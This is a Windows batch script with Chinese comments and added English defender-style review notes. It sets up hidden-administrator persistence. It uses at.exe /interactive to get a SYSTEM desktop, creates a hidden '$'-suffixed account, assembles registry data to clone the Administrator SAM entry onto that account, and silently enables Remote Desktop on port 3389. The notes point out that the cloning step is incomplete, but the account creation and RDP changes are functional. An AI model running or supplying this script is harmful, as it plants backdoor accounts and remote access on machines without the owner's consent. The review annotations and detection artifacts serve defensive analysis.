:: Windows batch (cmd.exe) script, not POSIX shell: the comment syntax is "::", and the
:: variables, labels and "for /f" forms below are cmd.exe constructs.
:: The listing chains three actions:
::   1. obtain a SYSTEM-level desktop by scheduling explorer.exe through at.exe /interactive
::      (labels :3, :2, :1);
::   2. create a "$"-suffixed local account and assemble a .reg file that places the
::      cloned account's SAM "F" value next to the new account's "V" value
::      (the original comments number this as step 1 and step 4);
::   3. enable Remote Desktop and pin its port to 3389 through a .reg import.
:: Review notes (defender's view):
::   - at.exe /interactive depends on the pre-Vista interactive SYSTEM session; from Vista
::     onward session 0 isolation keeps the scheduled explorer.exe off the user's desktop,
::     so this technique is tied to XP / Server 2003 era hosts.
::   - userrid and buserrid are read from the "find" commands onward but are never assigned
::     in this listing (the steps numbered 2 and 3 in the original comments are absent), and
::     the merged user-first.reg is deleted without ever being passed to regedit, so the
::     clone is not applied by the script as shown.
::   - Observable artifacts: taskkill of explorer.exe, an at.exe job, creation of a local
::     account whose name ends in "$" (Security event 4720), short-lived .reg and
::     systemreg00N.reg files under SystemRoot, and writes to HKLM\SAM\...\Users and to the
::     Terminal Server fDenyTSConnections / PortNumber values.
::首先 ,获得system的shell
:: First, obtain a SYSTEM shell.
:3
:: a1 = first four characters of the time string (HH:M); b1 = last digit of the minute.
set a1=%time:~0,4%
set b1=%time:~4,1%
:: Once the seconds field reads 55, jump to :2 so the at job is aimed at the next minute.
if %time:~6,2% EQU 55 goto 2
::减少CPU 100% 持续时间
:: Reduce the time spent at 100 percent CPU: ping against loopback is used as a sleep
:: while the loop waits for the seconds field to reach 55.
if %time:~6,2% leq 10 ping -n 10 127.1 >nul
if %time:~6,2% leq 20 ping -n 10 127.1 >nul
if %time:~6,2% leq 30 ping -n 10 127.1 >nul
if %time:~6,2% leq 40 ping -n 10 127.1 >nul
goto 3
:2
:: Kill the current desktop shell before the scheduled one starts.
taskkill /f /im explorer.exe
:: Pick the first digit greater than b1, i.e. the next minute, into c.
for %%i in (0 1 2 3 4 5 6 7 8 9) do if /i %%i GTR %b1% set c=%%i & goto 1
:1
:: Schedule explorer.exe for HH:MM (a1 followed by c); per the comment above this is
:: the step that yields the SYSTEM-level desktop.
at %a1%%c% /interactive %systemroot%\explorer.exe
:: Wait roughly 30 seconds for the job to fire.
ping -n 30 127.1 >nul
::第一步 创建克隆账号
:: Step 1: create the clone account.
::设定克隆账号
:: Name used for the clone account.
set user=123
::设定被克隆账号
:: Account whose SAM "F" value is copied.
set buser=Administrator
::设定路径
:: Registry path of the SAM user entries; writable only from a SYSTEM context.
set ridkey=HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\
::创建账号名为%user%$ 密码为%user% 的隐藏账号
:: Create a hidden account named user$ with password user (the trailing "$" keeps it
:: out of the usual net user listing).
net user %user%$ %user% /add
::第四步 替换配置
:: Step 4: replace the configuration.
::取出克隆账号的"V"=hex:部分
:: Extract the "V"=hex: section of the clone account's export into user-last.reg.
:: NOTE(review): userrid is not assigned anywhere in this listing, so the export file
:: named here does not exist as shown.
for /f "skip=6 delims=()" %%o in ('find /i "," %SystemRoot%\%userrid%.reg') do @echo %%o >>%SystemRoot%\%user%-last.reg
::建立头部
:: Build the .reg header for the clone account's key.
@echo Windows Registry Editor Version 5.00 >%SystemRoot%\%user%-first.reg
@echo.>>%SystemRoot%\%user%-first.reg
@echo [%ridkey%00000%userrid%] >>%SystemRoot%\%user%-first.reg
::取出被克隆账号的"F"=hex:,并合并到头部
:: Extract the "F"=hex: section of the cloned account's export and append it to the header.
:: The next four round trips each copy the first line of the temporary file into
:: user-first.reg, then write everything except that line into the next temporary file.
:: NOTE(review): buserrid is likewise never assigned in this listing.
for /f "skip=2 delims=()" %%q in ('find "," %SystemRoot%\%buserrid%.reg') do @echo %%q >>%SystemRoot%\systemreg001.reg
set /p a=<%SystemRoot%\systemreg001.reg
@echo %a:~0% >>%SystemRoot%\%user%-first.reg
for /f "skip=2 delims=()" %%o in ('find /v "%a:~4%" %SystemRoot%\systemreg001.reg') do @echo %%o >>%SystemRoot%\systemreg002.reg
del /q %SystemRoot%\systemreg001.reg
set /p a=<%SystemRoot%\systemreg002.reg
@echo %a:~0% >>%SystemRoot%\%user%-first.reg
for /f "skip=2 delims=()" %%o in ('find /v "%a:~4%" %SystemRoot%\systemreg002.reg') do @echo %%o >>%SystemRoot%\systemreg003.reg
del /q %SystemRoot%\systemreg002.reg
set /p a=<%SystemRoot%\systemreg003.reg
@echo %a:~0% >>%SystemRoot%\%user%-first.reg
for /f "skip=2 delims=()" %%o in ('find /v "%a:~4%" %SystemRoot%\systemreg003.reg') do @echo %%o >>%SystemRoot%\systemreg004.reg
del /q %SystemRoot%\systemreg003.reg
set /p a=<%SystemRoot%\systemreg004.reg
@echo %a:~0% >>%SystemRoot%\%user%-first.reg
del /q %SystemRoot%\systemreg004.reg
::将"F"=hex:以前部分好了的,与"V"=hex:部分合并
:: Merge the prepared "F"=hex: part with the "V"=hex: part.
type %SystemRoot%\%user%-last.reg >>%SystemRoot%\%user%-first.reg
:: Cleanup of the working files. NOTE(review): user-first.reg is deleted here without any
:: regedit import, and the user$.reg / buser$.reg files removed below were never created
:: in this listing.
del /q %SystemRoot%\%user%-first.reg
del /q %SystemRoot%\%user%-last.reg
del /q %SystemRoot%\%user%$.reg
del /q %SystemRoot%\%userrid%.reg
del /q %SystemRoot%\%buser%$.reg
del /q %SystemRoot%\%buserrid%.reg
::开3389
:: Enable Remote Desktop on port 3389: fDenyTSConnections=0 turns RDP on and
:: dword 00000d3d is 3389 decimal, the default port. The change is applied with a
:: silent regedit import and the temporary .reg file is removed afterwards.
@echo Windows Registry Editor Version 5.00>%SystemRoot%\3389.reg
@echo.>>%SystemRoot%\3389.reg
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>%SystemRoot%\3389.reg
@echo "fDenyTSConnections"=dword:00000000>>%SystemRoot%\3389.reg
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>%SystemRoot%\3389.reg
@echo "PortNumber"=dword:00000d3d>>%SystemRoot%\3389.reg
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>%SystemRoot%\3389.reg
@echo "PortNumber"=dword:00000d3d>>%SystemRoot%\3389.reg
regedit /s %SystemRoot%\3389.reg
del /q %SystemRoot%\3389.reg